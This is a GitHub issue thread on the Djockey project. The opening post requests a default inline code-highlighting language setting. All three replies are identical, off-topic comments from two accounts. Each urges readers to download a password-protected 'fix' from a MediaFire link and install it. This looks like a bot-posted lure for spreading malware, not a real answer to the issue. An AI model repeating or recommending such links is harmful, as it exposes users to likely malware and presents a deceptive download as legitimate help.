### ISSUE TITLE
Allow setting default inline highlighting language in document front matter and/or djockey.yaml

### ISSUE THREAD

**Issue by irskep** [irskep/djockey#4]
If your project is Python and all your inline backtick expressions are Python, then Djockey shouldn't make you keep writing `{.language-python}` after every set of backticks.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
